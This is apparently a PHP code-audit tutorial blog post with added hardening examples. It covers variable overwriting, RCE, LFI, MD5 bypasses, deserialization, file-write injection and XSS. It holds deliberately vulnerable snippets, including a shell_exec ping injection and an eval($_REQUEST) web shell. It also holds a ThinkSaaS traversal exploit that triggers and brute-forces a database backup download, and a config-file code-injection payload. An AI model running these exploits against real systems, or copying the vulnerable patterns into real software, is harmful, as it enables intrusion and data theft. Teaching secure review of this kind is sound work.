PHP Code Audit

Code audit helper tools

https://github.com/WhaleShark-Team/cobra
https://github.com/LoRexxar/Kunlun-M

Variable overwriting

extract()
import_request_variables()
parse_str()
mb_parse_str()
register_globals
Initializing variables by looping over a request array
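As an added example (not code from the original post), the script below shows how extract(), a "loop over the request to initialize variables" pattern and the one-argument form of parse_str() let a request overwrite a variable the script already set (register_globals did the same to every script automatically), next to the safe patterns. $fakeGet stands in for $_GET and is constructed for the demo.

```php
<?php
// Added example, not from the original post. It shows how extract(), a
// foreach "initialize everything" loop and the one-argument form of parse_str()
// let a request overwrite a variable the script already set, and safe
// patterns. $fakeGet stands in for $_GET and is constructed for the demo.
$fakeGet = ['user' => 'guest', 'isAdmin' => '1'];

// Vulnerable: extract() imports every key as a local variable, overwriting $isAdmin.
function viaExtract(array $get): bool
{
    $isAdmin = false;
    extract($get);
    return (bool) $isAdmin;
}

// Vulnerable: the same thing written by hand with variable variables,
// which is what a "loop over the request to initialize variables" does.
function viaLoop(array $get): bool
{
    $isAdmin = false;
    foreach ($get as $key => $value) {
        $$key = $value;
    }
    return (bool) $isAdmin;
}

// Safer: EXTR_SKIP keeps variables that already exist; EXTR_PREFIX_ALL
// is the other option, putting every imported key under a prefix.
function viaExtractSkip(array $get): bool
{
    $isAdmin = false;
    extract($get, EXTR_SKIP);
    return (bool) $isAdmin;
}

// Safe: parse_str() with a result array keeps the data out of the local scope
// (the scope-polluting one-argument form was removed in PHP 8.0).
function viaParseStr(string $query): bool
{
    $isAdmin = false;
    parse_str($query, $params);
    return (bool) $isAdmin;
}

// Safest: read only the keys you expect and never take privilege from input.
function viaWhitelist(array $get): array
{
    return [
        'user'    => (string) ($get['user'] ?? 'guest'),
        'isAdmin' => false,
    ];
}

foreach (['viaExtract', 'viaLoop', 'viaExtractSkip'] as $fn) {
    printf("%-15s isAdmin=%s\n", $fn, var_export($fn($fakeGet), true));
}
printf("%-15s isAdmin=%s\n", 'viaParseStr', var_export(viaParseStr(http_build_query($fakeGet)), true));
printf("%-15s isAdmin=%s\n", 'viaWhitelist', var_export(viaWhitelist($fakeGet)['isAdmin'], true));
```

With the constructed request, viaExtract and viaLoop report isAdmin=true because the request value replaced the default; the other three keep it false. During an audit, grep for extract(, parse_str( with one argument, $$ and import_request_variables( and check whether any variable that was assigned earlier in the same scope can be reached by a request key.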

file_get_contents function bypass

1) Bypass using the php://input pseudo-protocol
2) Bypass using the data:// pseudo-protocol

RCE

RCE functions
PHP: eval, preg_replace with the /e modifier, assert
JavaScript: eval
VBScript: Execute, Eval
Python: exec
<?php include($_SERVER['DOCUMENT_ROOT'].'/btslab/header.php'); ?>
  <br/><b>Ping:</b>Please Enter Domain Name or IP Address: <br/><br/>
  <form action="cmd.php" method="get">
  <input type="text" name="host" value=""/>
  <br/><br/><input type="submit" name="Go" value="Go"/>
  </form>
  <br/>

<?php
if(isset($_GET['host']))
{
    // Vulnerable: $_GET['host'] is concatenated straight into the command
    // line, so any shell metacharacters in it are interpreted by the shell.
    if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
    {
        $result=shell_exec("ping ".$_GET['host']);
    }
    else
    {
        $result=shell_exec("ping -c 4 ".$_GET['host']);
    }

    // The raw command output is also echoed into the page unescaped.
    echo "<b>Result:</b></br><pre>".$result."</pre>";
}
?>

<?php include($_SERVER['DOCUMENT_ROOT'].'/btslab/footer.php'); ?>
<?php
// Vulnerable: arbitrary PHP taken from the request is executed.
eval($_REQUEST['code']);
?>
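As an added example (not btslab code and not from the original post), here is the ping handler above rewritten so that the host is validated and then quoted before it reaches the shell. The function names (validHost, pingCommand, handlePing) and the dry-run switch are assumptions of this demo; eval() has no equivalent hardening, request data must simply never reach it.

```php
<?php
// Added example, not btslab code: the ping handler with input validation and
// escapeshellarg(). handlePing() builds the command but only executes it when
// $run is true, so the demo can be read without running ping at all.
function validHost(string $host): bool
{
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    // hostname: dot-separated labels of letters, digits and hyphens,
    // no leading/trailing hyphen, at most 253 characters in total
    return strlen($host) <= 253
        && preg_match('/^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$/', $host) === 1;
}

function pingCommand(string $host): ?string
{
    if (!validHost($host)) {
        return null;                          // refuse rather than try to clean it
    }
    $isWindows = strtoupper(substr(PHP_OS, 0, 3)) === 'WIN';
    $flag = $isWindows ? '-n 4' : '-c 4';
    // escapeshellarg() wraps the value in quotes and escapes embedded quotes,
    // so ; | & ` $( ) and newlines stay inside a single argument.
    return 'ping ' . $flag . ' ' . escapeshellarg($host);
}

function handlePing(array $get, bool $run = false): string
{
    if (!isset($get['host'])) {
        return '';
    }
    $cmd = pingCommand((string) $get['host']);
    if ($cmd === null) {
        return '<b>Result:</b><br/><pre>invalid host</pre>';
    }
    $output = $run ? (string) shell_exec($cmd) : $cmd;
    // Escape the output as well: ping echoes the host name back into the page.
    return '<b>Result:</b><br/><pre>' . htmlspecialchars($output, ENT_QUOTES, 'UTF-8') . '</pre>';
}

// Constructed inputs: a plain address and one carrying shell metacharacters.
echo handlePing(['host' => '127.0.0.1']), "\n";
echo handlePing(['host' => '127.0.0.1; id']), "\n";
```

The first call shows the quoted command that would run; the second is refused by validHost() before any command is built. Validation first and escapeshellarg() second is deliberate: the allow-list is the control, the quoting is defence in depth in case the allow-list is later loosened.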

 

LFI -> backup file download

<?php
// Plugin entry point: $app, $plugin and $in come from the request and are
// joined into a path with no traversal check, so "../" in $in can reach any
// .php file, not only those under plugins/.
defined('IN_TS') or die('Access Denied.');
if(is_file('plugins/'.$app.'/'.$plugin.'/'.$in.'.php')){
    require_once('plugins/'.$app.'/'.$plugin.'/'.$in.'.php');
}else{
    tsNotice('sorry:no plugin!');
}

// app/system/action/sql: the admin-only backup action that the include
// above can reach.
defined('IN_TS') or die('Access Denied.');
switch($ts){
    case "":

        // List the backup files
        $arrSqlFile = tsScanDir('data/baksql','file');

        include template('sql');
        break;

    // Optimize
    case "optimize":
        $arrTables = $db->fetch_all_assoc("SHOW TABLES");
        foreach($arrTables as $key=>$item){
            $db->query("OPTIMIZE TABLE `".$item."` ");
        }
        qiMsg('优化数据库成功!');
        break;

    // Backup / export
    case "export":

        require_once 'thinksaas/DbManage.php';
        $bakdb = new DBManage ( $TS_DB['host'].':'.$TS_DB['port'], $TS_DB['user'], $TS_DB['pwd'], $TS_DB['name'], 'utf8' );
        // The dump is written into data/baksql/, which is inside the web root
        $bakdb->backup ('','data/baksql/');

        qiMsg('数据库备份完毕!');

        break;
}

<?php
date_default_timezone_set('Asia/Hong_Kong');
// Root cause 1: the plugin loader does not restrict $in, so the traversal
// reaches the sql action, and ts=export makes it write a backup.
$url = "http://192.168.116.129/thinksaas/index.php?app=user&ac=plugin&plugin=face&in=my5t3ry/../../../../app/system/action/sql&ts=export";
file_get_contents($url);
// Root cause 2: the backup name is a timestamp in a web-accessible directory,
// so the file name is guessable within a short window.
$time = date('YmdHis');
for($i = $time; $i <= $time + 300; $i++){
    $filename = $i ."_all_v1.sql";
    $url = "http://192.168.116.129/thinksaas/data/baksql/".$filename;
    if (@file_get_contents($url, null, null, -1, 1)){
        echo $url;
    }
}
?>
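As an added example (not ThinkSaaS code and not from the original post), the script below serves two sections above: the file_get_contents pseudo-protocol bypass and the traversable plugin include. One helper, containedPath(), resolves a user-supplied name to a real file under a fixed directory and rejects stream wrappers, NUL bytes and "../"; backupDirOutsideWebroot() is the second fix the backup case needs. Directory names, the expected file content and all function names are assumptions of the demo.

```php
<?php
// Added example, not ThinkSaaS code and not from the original post. Covers the
// file_get_contents() wrapper bypass and the plugin-include traversal with one
// containment helper, plus a check that backups do not sit under the web root.

// Resolve $name under $baseDir, or return null if it escapes or is not a file.
function containedPath(string $baseDir, string $name): ?string
{
    if (strpos($name, '://') !== false || strpos($name, "\0") !== false) {
        return null;                     // php://, data://, phar:// ... never reach the filesystem
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    // realpath() resolved ".." and symlinks, so a prefix test is a containment test.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Section "file_get_contents bypass": a check that compares the contents of a
// file the user chose. The naive version accepts anything file_get_contents()
// can open, including data:// and php://input.
const EXPECTED = 'I love PHP';

function naiveContentCheck(string $file): bool
{
    return @file_get_contents($file) === EXPECTED;
}

function containedContentCheck(string $baseDir, string $file): bool
{
    $real = containedPath($baseDir, $file);
    return $real !== null && file_get_contents($real) === EXPECTED;
}

// Section "LFI -> backup file download": each request segment must be a bare
// identifier before it is joined into a path, and the result must stay under
// the plugins directory.
function pluginFile(string $pluginsDir, string $app, string $plugin, string $in): ?string
{
    foreach ([$app, $plugin, $in] as $seg) {
        if (preg_match('/^[A-Za-z0-9_]{1,64}$/', $seg) !== 1) {
            return null;
        }
    }
    return containedPath($pluginsDir, "$app/$plugin/$in.php");
}

// Backups must live outside the document root (or behind an authenticated
// download handler); a timestamped file in a public directory is guessable.
function backupDirOutsideWebroot(string $backupDir, string $docRoot): bool
{
    $b = realpath($backupDir);
    $d = realpath($docRoot);
    return $b !== false && $d !== false
        && strncmp($b, $d . DIRECTORY_SEPARATOR, strlen($d) + 1) !== 0;
}

// Demo on a constructed directory layout under the system temp dir.
$root = sys_get_temp_dir() . '/audit_demo_' . getmypid();
foreach (['www/plugins/user/face', 'www/app/system/action', 'www/data/baksql', 'private/baksql'] as $d) {
    mkdir("$root/$d", 0700, true);
}
file_put_contents("$root/www/plugins/user/face/index.php", "<?php\n");
file_put_contents("$root/www/app/system/action/sql.php", "<?php\n");
file_put_contents("$root/www/flag.txt", EXPECTED);

var_dump(naiveContentCheck('data://text/plain,' . rawurlencode(EXPECTED)));
var_dump(containedContentCheck("$root/www", 'data://text/plain,' . rawurlencode(EXPECTED)));
var_dump(containedContentCheck("$root/www", 'flag.txt'));
var_dump(pluginFile("$root/www/plugins", 'user', 'face', 'index'));
var_dump(pluginFile("$root/www/plugins", 'user', 'face', 'x/../../../../app/system/action/sql'));
var_dump(backupDirOutsideWebroot("$root/www/data/baksql", "$root/www"));
var_dump(backupDirOutsideWebroot("$root/private/baksql", "$root/www"));

// Remove the constructed layout.
$it = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
    RecursiveIteratorIterator::CHILD_FIRST
);
foreach ($it as $p) {
    $p->isDir() ? rmdir($p->getPathname()) : unlink($p->getPathname());
}
rmdir($root);
```

The naive check passes for the data:// wrapper while the contained check refuses it and accepts only flag.txt; the plugin resolver returns the real path for user/face/index and null for the traversal string (the regex rejects it before the filesystem is consulted); the web-root backup directory fails the placement check and the private one passes. When reviewing an include or file-read sink, look for exactly these three properties: wrapper rejection, realpath-based containment, and sensitive output written somewhere the web server does not serve.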

 

PHP MD5 bypass - scientific notation bypass

 

PHP MD5 bypass - array strict-equality bypass
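As an added example (not from the original post), the script below covers both MD5 headings: loose comparison (==) of two digests that look like scientific notation, and strict comparison (===) when the inputs are arrays rather than strings. The inputs are constructed ("QNKCDZO" and "240610708" are well-known strings whose MD5 digests start with "0e" followed only by digits); the function names are assumptions of the demo.

```php
<?php
// Added example, not from the original post. Both MD5 "bypasses" come from
// comparing digests with == or hashing non-string input; the fix is a type
// check plus hash_equals().

// Vulnerable: == compares two numeric strings as numbers, and "0e<digits>" is 0.0,
// so any two such digests are "equal". This holds on PHP 8 as well.
function looseMd5Match(string $a, string $b): bool
{
    return md5($a) == md5($b);
}

// Vulnerable when the parameters are untyped: on PHP 7, md5(array) returns NULL
// with a warning, so two array inputs give NULL === NULL. PHP 8 throws a
// TypeError instead, which is caught here only so the demo runs on both.
function strictMd5MatchUntyped($a, $b): bool
{
    try {
        return @md5($a) === @md5($b);
    } catch (TypeError $e) {
        return false;
    }
}

// Hardened: refuse non-strings, then compare with hash_equals(), which is
// type-strict (no numeric coercion) and constant-time.
function safeMd5Match($a, $b): bool
{
    if (!is_string($a) || !is_string($b)) {
        return false;
    }
    return hash_equals(md5($a), md5($b));
}

// Constructed inputs: two magic-hash strings, and two arrays as a request
// parameter written as a[]=x would deliver them.
echo md5('QNKCDZO'), ' ', md5('240610708'), "\n";
var_dump(looseMd5Match('QNKCDZO', '240610708'));
var_dump(safeMd5Match('QNKCDZO', '240610708'));
var_dump(strictMd5MatchUntyped(['x'], ['y']));
var_dump(safeMd5Match(['x'], ['y']));
```

The loose match reports the two different strings as equal and, on PHP 7, the untyped strict match reports the two arrays as equal; safeMd5Match() returns false in both cases. During an audit, any == between hash values, and any hash call whose argument can be an array, is a finding regardless of the PHP version in use.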

Deserialization

__construct()
__destruct()
__call()
__callStatic()
__get()
__set()
__isset()
__unset()
__sleep()
__wakeup()
__toString()
__invoke()
__set_state()
__clone()
__debugInfo() 
unserialize()
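As an added example (not from the original post), the script below shows what links the magic-method list above to unserialize(): a class with a __destruct() that has a filesystem side effect is the simplest gadget shape, and unserialize() on untrusted data instantiates it with attacker-chosen properties. The class CacheFile, the target path and the serialized string are constructed for the demo; the hardening shown is allowed_classes => false and a data-only format.

```php
<?php
// Added example, not from the original post. CacheFile is a constructed class
// whose destructor writes a file; unserialize() of a constructed payload
// instantiates it, and the destructor runs when the object is freed.
class CacheFile
{
    public string $path = '';
    public string $data = '';

    public function __destruct()
    {
        // runs whenever an instance is freed, including one built by unserialize()
        if ($this->path !== '') {
            file_put_contents($this->path, $this->data);
        }
    }
}

// Vulnerable: any class loaded in the process can be instantiated with
// attacker-chosen property values.
function loadUnsafe(string $serialized)
{
    return unserialize($serialized);
}

// Hardened: allowed_classes => false turns every object into
// __PHP_Incomplete_Class, whose magic methods never run.
function loadSafe(string $serialized)
{
    return unserialize($serialized, ['allowed_classes' => false]);
}

// Preferred for untrusted input: a data-only format that cannot name a class.
function loadJson(string $json): array
{
    return json_decode($json, true, 512, JSON_THROW_ON_ERROR);
}

$target = sys_get_temp_dir() . '/unser_demo_' . getmypid() . '.txt';
// Constructed payload in the wire format O:<len>:"<class>":<n>:{<props>}.
$payload = 'O:9:"CacheFile":2:{s:4:"path";s:' . strlen($target) . ':"' . $target
         . '";s:4:"data";s:8:"injected";}';

$obj = loadUnsafe($payload);
unset($obj);                              // __destruct() fires here
echo "unsafe load wrote file: ", var_export(file_exists($target), true), "\n";
@unlink($target);

$safe = loadSafe($payload);
echo "safe load produced: ", get_class($safe), "\n";
unset($safe);                             // no class body attached, so no __destruct()
echo "safe load wrote file: ", var_export(file_exists($target), true), "\n";

echo "json load: ", json_encode(loadJson('{"path":"ignored","data":"x"}')), "\n";
```

The unsafe load creates the target file, the safe load produces a __PHP_Incomplete_Class and creates nothing, and the JSON loader only ever yields arrays. When auditing, trace every unserialize() call back to its data source and then list the __destruct(), __wakeup() and __toString() implementations available in the code base and its vendored dependencies, since those are the methods that run without any call from the application.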

 

File write

file_put_contents()
Payload:
');phpinfo();exit();// (adjust the ');  part to fit the surrounding code)
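As an added example (not from the original post), the script below shows the pattern that payload targets: a settings page that writes a user value into a PHP config file by string concatenation, beside a writer that uses var_export() so quotes in the value cannot terminate the literal. The paths, the config shape and the function names are assumptions of the demo.

```php
<?php
// Added example, not from the original post: writing a setting into a PHP
// file. The vulnerable writer pastes the value between quotes; the safe
// writer emits a proper literal; the JSON writer avoids executable config.
function writeConfigVulnerable(string $file, string $siteName): void
{
    // The value is placed between single quotes with no escaping at all.
    $php = "<?php\n\$config['site_name'] = '" . $siteName . "';\n";
    file_put_contents($file, $php);
}

function writeConfigSafe(string $file, string $siteName): void
{
    // var_export() emits a valid PHP string literal with ' and \ escaped.
    $php = "<?php\n\$config['site_name'] = " . var_export($siteName, true) . ";\n";
    file_put_contents($file, $php);
}

// Better still: keep configuration in a format that is parsed, not executed.
function writeConfigJson(string $file, string $siteName): void
{
    file_put_contents($file, json_encode(['site_name' => $siteName], JSON_THROW_ON_ERROR));
}

// Constructed input in the shape the post describes: close the literal and
// the statement, then comment out the rest of the line.
$input = "');phpinfo();exit();//";
$dir  = sys_get_temp_dir();
$vuln = "$dir/cfg_vuln_" . getmypid() . '.php';
$safe = "$dir/cfg_safe_" . getmypid() . '.php';
$json = "$dir/cfg_" . getmypid() . '.json';

writeConfigVulnerable($vuln, $input);
writeConfigSafe($safe, $input);
writeConfigJson($json, $input);

echo "vulnerable file:\n", file_get_contents($vuln);
echo "safe file:\n", file_get_contents($safe);
echo "json file:\n", file_get_contents($json), "\n";

// Loading the safe file gives the original value back unchanged.
$config = [];
include $safe;
var_dump($config['site_name'] === $input);

$decoded = json_decode(file_get_contents($json), true, 512, JSON_THROW_ON_ERROR);
var_dump($decoded['site_name'] === $input);

unlink($vuln);
unlink($safe);
unlink($json);
```

The vulnerable file's single line now contains three statements, while the safe file holds one string literal that round-trips to the original value (the vulnerable file is printed but deliberately never included). The audit question for every file_put_contents() or fwrite() sink is whether the written bytes are later executed by include, require or eval, and if so whether each interpolated value went through var_export() or an equivalent.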

 

SQLI

update()

 

XSS

echo

htmlspecialchars() bypass
https://www.zhihu.com/question/27646993
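As an added example (not from the original post or the linked discussion), the script below shows the bypass class the link refers to: htmlspecialchars() with its pre-8.1 default flag (ENT_COMPAT) leaves the single quote alone, so a value placed inside a single-quoted attribute can close the attribute. It also shows that the encoder must match the output context. The function names and the sample input are constructed for the demo.

```php
<?php
// Added example, not from the original post. ENT_COMPAT is passed explicitly
// so the pre-PHP-8.1 default behaviour is reproduced on every version.
function renderAttrDefault(string $value): string
{
    // ' is not encoded, so the value can terminate a single-quoted attribute
    return "<input value='" . htmlspecialchars($value, ENT_COMPAT, 'UTF-8') . "'>";
}

function renderAttrQuoted(string $value): string
{
    // ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE keeps invalid
    // UTF-8 from producing an empty string that silently drops the output
    return "<input value='" . htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "'>";
}

// A JavaScript string is a different context: HTML encoding is the wrong
// tool there, json_encode() with the hex flags produces a safe JS literal.
function renderJsVar(string $value): string
{
    $js = json_encode($value, JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP);
    return "<script>var name = " . $js . ";</script>";
}

// Constructed input carrying a single quote followed by an event handler.
$input = "x' onfocus='alert(1)' autofocus='";
echo renderAttrDefault($input), "\n";
echo renderAttrQuoted($input), "\n";
echo renderJsVar('</script><script>alert(1)</script>'), "\n";
```

In the first line the single quote survives and the attribute is split; in the second it becomes &#039; and the whole input stays one attribute value; in the third the angle brackets are emitted as \u003C and \u003E so the script tag cannot be closed. When auditing an echo, record the output context (element body, double- or single-quoted attribute, URL, JavaScript) before deciding whether a given htmlspecialchars() call is sufficient.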


 

Open-source projects

https://github.com/bowu678/php_bugs

 

posted @ 2019-08-09 11:03 7hang